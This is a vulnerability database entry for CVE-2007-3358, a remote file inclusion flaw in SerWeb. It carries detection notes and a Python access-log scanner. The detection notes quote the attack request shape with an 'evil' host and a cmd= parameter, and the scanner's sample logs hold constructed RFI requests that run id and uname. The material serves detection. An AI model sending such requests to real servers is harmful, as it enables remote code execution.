CVE-2007-3358
Published 2007-06-22
Priority: P354 · medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed (see references)
EPSS: 68.01% (99.2th percentile)
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iptel | serweb | <= 0.9.6 | — |
| iptel | serweb | <= 2.0.0dev1 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to load_lang.php containing a URL (http:// or https://) in the _SERWEB[serwebdir] GET parameter, which indicates remote file inclusion exploitation.
- The exploit appends a trailing '?' and a 'cmd' parameter to the injected shell URL (e.g., ?_SERWEB[serwebdir]=http://evil/cmd.txt?&cmd=<command>), which can be used as a detection pattern in web server logs.
- The exploit is implemented as a Perl LWP::Simple HTTP client issuing GET requests; look for automated sequential requests to load_lang.php with varying cmd= values from the same source IP.
- The vulnerability affects SerWeb 0.9.6 and earlier (including 0.9.4); the exploit targets the publicly available tarball from the iptel.org FTP server.
- The NVD entry specifies the vulnerable file path as html/load_lang.php, while the exploit targets /load_lang.php directly; the actual web-accessible path may vary depending on deployment configuration.
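The detection notes above describe three log-level signals: a URL-valued _SERWEB[...] or _PHPLIB[...] parameter sent to one of the SerWeb include scripts, the trailing '?' plus cmd= shape, and bursts of requests with varying cmd= values from one source. The following script, added here as an example and not taken from the CVE record or from SerWeb, applies all three to access-log lines. It matches on the script basename only, because the web-accessible prefix varies by deployment, and it also covers the sibling parameters named in CVE-2007-6289 (_SERWEB[configdir], _SERWEB[functionsdir], _PHPLIB[libdir]). The log lines, IP addresses and cmd values are constructed for the example; the User-Agent "libwww-perl/..." is LWP's default and is recorded as context, not used as a match criterion.

```python
"""Flag SerWeb remote-file-inclusion attempts in web server access logs.

Added example, not part of the CVE record or of SerWeb. Sample log lines
below are constructed; addresses come from RFC 5737 documentation ranges.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Scripts and parameters named in CVE-2007-3358 and CVE-2007-6289.
# Matched on the script name only: the prefix (/load_lang.php versus
# /html/load_lang.php) depends on how SerWeb was deployed.
WATCHED_PARAMS = {
    "load_lang.php": {"_SERWEB[serwebdir]", "_SERWEB[configdir]"},
    "main_prepend.php": {"_SERWEB[functionsdir]"},
    "load_phplib.php": {"_PHPLIB[libdir]"},
}
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)

# Apache/nginx "combined" log format; referer and user-agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample: two RFI attempts from one source (second one
# percent-encoded), two benign requests, one attempt against main_prepend.php.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jun/2007:10:15:01 +0000] "GET /load_lang.php?_SERWEB[serwebdir]=http://203.0.113.77/c.txt?&cmd=id HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [22/Jun/2007:10:15:02 +0000] "GET /load_lang.php?_SERWEB%5Bserwebdir%5D=http%3A%2F%2F203.0.113.77%2Fc.txt%3F&cmd=uname HTTP/1.1" 200 611 "-" "libwww-perl/5.805"
198.51.100.9 - - [22/Jun/2007:10:16:40 +0000] "GET /serweb/html/load_lang.php?lang=en HTTP/1.1" 200 220 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Jun/2007:10:16:41 +0000] "GET /serweb/html/index.php HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
192.0.2.33 - - [22/Jun/2007:10:20:00 +0000] "GET /serweb/html/main_prepend.php?_SERWEB[functionsdir]=https://192.0.2.200/f.txt? HTTP/1.1" 200 90 "-" "curl/7.16"
"""


def analyze_request(target):
    """Return a finding dict for one request target, or None when benign.

    A finding means: the script is one of the watched include scripts and a
    watched parameter carries an absolute http(s) URL (the RFI primitive).
    """
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED_PARAMS.get(script)
    if not watched:
        return None
    # parse_qsl percent-decodes keys, so _SERWEB%5Bserwebdir%5D is normalised.
    params = parse_qsl(parts.query, keep_blank_values=True)
    for key, value in params:
        if key in watched and REMOTE_URL.match(value):
            cmd = next((v for k, v in params if k == "cmd"), None)
            return {
                "script": script,
                "param": key,
                "include": value,
                "trailing_q": value.endswith("?"),  # the '?&cmd=' shape
                "cmd": cmd,
            }
    return None


def scan_log(text):
    """Parse combined-format lines and return the list of RFI findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line
        finding = analyze_request(m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], ua=m["ua"])
            findings.append(finding)
    return findings


def suspicious_sources(findings, min_distinct=2):
    """Sources that issued RFI requests with at least min_distinct cmd values.

    This captures the 'automated sequential requests with varying cmd=' signal.
    """
    cmds_by_ip = defaultdict(set)
    for f in findings:
        if f["cmd"] is not None:
            cmds_by_ip[f["ip"]].add(f["cmd"])
    return {ip: sorted(c) for ip, c in cmds_by_ip.items() if len(c) >= min_distinct}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['script']} {h['param']}={h['include']} cmd={h['cmd']}")
    print("sources with varying cmd=:", suspicious_sources(hits))
```

Run it as-is to see the three findings and the one source flagged for varying cmd= values; point scan_log at a real access log to apply the same checks. Matching on the decoded parameter name rather than the raw string matters, since the percent-encoded form of the brackets would otherwise slip past a naive substring search.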
GHSA
GHSA-3v53-3p82-fw82: Multiple PHP remote file inclusion vulnerabilities in SerWeb 2
CVE-2007-6289 · MEDIUM · CWE-94 · CVSS 6.8 · GHSA unreviewed · 2022-05-01
Multiple PHP remote file inclusion vulnerabilities in SerWeb 2.0.0 dev1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SERWEB[configdir] parameter to load_lang.php, (2) _SERWEB[functionsdir] parameter to main_prepend.php, and the (3) _PHPLIB[libdir] parameter to load_phplib.php, different vectors than CVE-2007-3359 and CVE-2007-3358.
GHSA
GHSA-xv4p-rc8w-pq62: PHP remote file inclusion vulnerability in html/load_lang
CVE-2007-3358 · MEDIUM · GHSA unreviewed · 2022-05-01
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/36324
- http://secunia.com/advisories/25680
- http://www.securityfocus.com/bid/24581
- http://www.vupen.com/english/advisories/2007/2291
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34973
- https://www.exploit-db.com/exploits/4089